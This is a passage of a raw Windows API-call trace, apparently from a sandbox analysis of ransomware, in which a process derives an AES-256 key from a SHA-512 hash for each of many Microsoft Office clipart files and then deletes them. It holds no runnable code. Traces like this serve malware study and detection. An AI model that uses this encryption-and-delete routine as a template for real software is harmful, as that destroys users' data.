[0189.212] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0189.212] wcslen (_String="OK") returned 0x2 [0189.212] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.212] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.212] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0189.212] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0189.212] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0189.214] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0189.214] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.214] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad438) returned 1 [0189.214] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.214] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.214] wcslen (_String="\\\\?\\") returned 0x4 [0189.375] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 1 [0189.375] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0189.376] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0189.376] wcslen (_String="OK") returned 0x2 [0189.376] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.376] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.376] CryptDestroyKey (hKey=0x9ad438) returned 1 [0189.376] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0189.376] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0189.378] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0189.378] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.378] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad8b8) returned 1 [0189.378] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.378] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.378] wcslen (_String="\\\\?\\") returned 0x4 [0189.385] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 1 [0189.386] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0189.386] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0189.386] wcslen (_String="OK") returned 0x2 [0189.386] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.386] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.386] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0189.386] CryptDestroyHash (hHash=0x9ad478) returned 1 [0189.387] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0189.388] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0189.388] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.388] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad678) returned 1 [0189.388] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.388] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.388] wcslen (_String="\\\\?\\") returned 0x4 [0189.409] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 1 [0189.410] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0189.411] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0189.411] wcslen (_String="OK") returned 0x2 [0189.411] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.411] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.411] CryptDestroyKey (hKey=0x9ad678) returned 1 [0189.411] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0189.411] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0189.413] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0189.413] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.413] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad6b8) returned 1 [0189.413] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.413] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.413] wcslen (_String="\\\\?\\") returned 0x4 [0189.420] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 1 [0189.420] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0189.421] CryptDestroyKey (hKey=0x9ad338) returned 1 [0189.421] wcslen (_String="OK") returned 0x2 [0189.421] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.421] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.421] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0189.421] CryptDestroyHash (hHash=0x9ad478) returned 1 [0189.421] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0189.423] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0189.424] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.424] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad338) returned 1 [0189.424] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.424] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.424] wcslen (_String="\\\\?\\") returned 0x4 [0189.494] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 1 [0189.495] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0189.495] CryptDestroyKey (hKey=0x9ad878) returned 1 [0189.495] wcslen (_String="OK") returned 0x2 [0189.495] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.495] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.495] CryptDestroyKey (hKey=0x9ad338) returned 1 [0189.495] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0189.496] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0189.497] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0189.497] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.497] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad738) returned 1 [0189.497] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.497] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.497] wcslen (_String="\\\\?\\") returned 0x4 [0189.740] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 1 [0189.740] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0189.741] CryptDestroyKey (hKey=0x9ad478) returned 1 [0189.741] wcslen (_String="OK") returned 0x2 [0189.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.741] CryptDestroyKey (hKey=0x9ad738) returned 1 [0189.741] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0189.741] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0189.744] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0189.744] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.744] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad138) returned 1 [0189.744] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.744] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.744] wcslen (_String="\\\\?\\") returned 0x4 [0189.788] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 1 [0189.788] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0189.789] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0189.789] wcslen (_String="OK") returned 0x2 [0189.789] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.789] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.789] CryptDestroyKey (hKey=0x9ad138) returned 1 [0189.789] CryptDestroyHash (hHash=0x9ad478) returned 1 [0189.790] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0189.791] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0189.791] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.791] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad5b8) returned 1 [0189.791] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.791] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.791] wcslen (_String="\\\\?\\") returned 0x4 [0189.840] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 1 [0189.840] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0189.841] CryptDestroyKey (hKey=0x9ad238) returned 1 [0189.841] wcslen (_String="OK") returned 0x2 [0189.842] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.842] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.842] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0189.842] CryptDestroyHash (hHash=0x9ad138) returned 1 [0189.842] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0189.844] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0189.844] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.844] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad138) returned 1 [0189.845] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.845] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.845] wcslen (_String="\\\\?\\") returned 0x4 [0189.913] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 1 [0189.913] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0189.914] CryptDestroyKey (hKey=0x9ad238) returned 1 [0189.914] wcslen (_String="OK") returned 0x2 [0189.914] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.914] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0189.914] CryptDestroyKey (hKey=0x9ad138) returned 1 [0189.914] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0189.914] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0189.916] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0189.917] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.917] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad2f8) returned 1 [0189.917] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0189.917] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0189.917] wcslen (_String="\\\\?\\") returned 0x4 [0190.176] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 1 [0190.177] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0190.178] CryptDestroyKey (hKey=0x9ad478) returned 1 [0190.178] wcslen (_String="OK") returned 0x2 [0190.178] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.178] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.178] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0190.178] CryptDestroyHash (hHash=0x9ad438) returned 1 [0190.178] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0190.180] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0190.180] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.180] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad178) returned 1 [0190.181] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.181] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.181] wcslen (_String="\\\\?\\") returned 0x4 [0190.197] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 1 [0190.197] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0190.198] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0190.198] wcslen (_String="OK") returned 0x2 [0190.198] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.198] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.198] CryptDestroyKey (hKey=0x9ad178) returned 1 [0190.198] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0190.198] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0190.201] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0190.201] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.201] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad1b8) returned 1 [0190.201] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.201] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.201] wcslen (_String="\\\\?\\") returned 0x4 [0190.288] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 1 [0190.288] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0190.289] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0190.289] wcslen (_String="OK") returned 0x2 [0190.289] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.289] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.289] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0190.289] CryptDestroyHash (hHash=0x9ad438) returned 1 [0190.289] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0190.291] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0190.291] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.291] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0190.291] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.291] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.291] wcslen (_String="\\\\?\\") returned 0x4 [0190.319] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 1 [0190.319] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0190.320] CryptDestroyKey (hKey=0x9ad238) returned 1 [0190.320] wcslen (_String="OK") returned 0x2 [0190.320] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.320] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.320] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0190.320] CryptDestroyHash (hHash=0x9ad378) returned 1 [0190.320] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0190.322] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0190.322] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.322] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad238) returned 1 [0190.322] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.322] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.322] wcslen (_String="\\\\?\\") returned 0x4 [0190.412] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 1 [0190.412] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0190.413] CryptDestroyKey (hKey=0x9ad138) returned 1 [0190.413] wcslen (_String="OK") returned 0x2 [0190.413] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.413] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.413] CryptDestroyKey (hKey=0x9ad238) returned 1 [0190.413] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0190.413] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0190.416] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0190.416] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.416] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad438) returned 1 [0190.416] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.416] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.416] wcslen (_String="\\\\?\\") returned 0x4 [0190.431] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 1 [0190.431] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0190.432] CryptDestroyKey (hKey=0x9ad478) returned 1 [0190.432] wcslen (_String="OK") returned 0x2 [0190.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.432] CryptDestroyKey (hKey=0x9ad438) returned 1 [0190.432] CryptDestroyHash (hHash=0x9ad738) returned 1 [0190.432] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0190.435] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0190.435] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.435] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4b8) returned 1 [0190.435] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.435] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.435] wcslen (_String="\\\\?\\") returned 0x4 [0190.584] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 1 [0190.584] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0190.586] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0190.586] wcslen (_String="OK") returned 0x2 [0190.586] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.586] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.586] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0190.586] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0190.586] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0190.588] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0190.588] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.588] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad1b8) returned 1 [0190.588] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.588] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.588] wcslen (_String="\\\\?\\") returned 0x4 [0190.618] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 1 [0190.618] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0190.619] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0190.619] wcslen (_String="OK") returned 0x2 [0190.619] fflush (in: 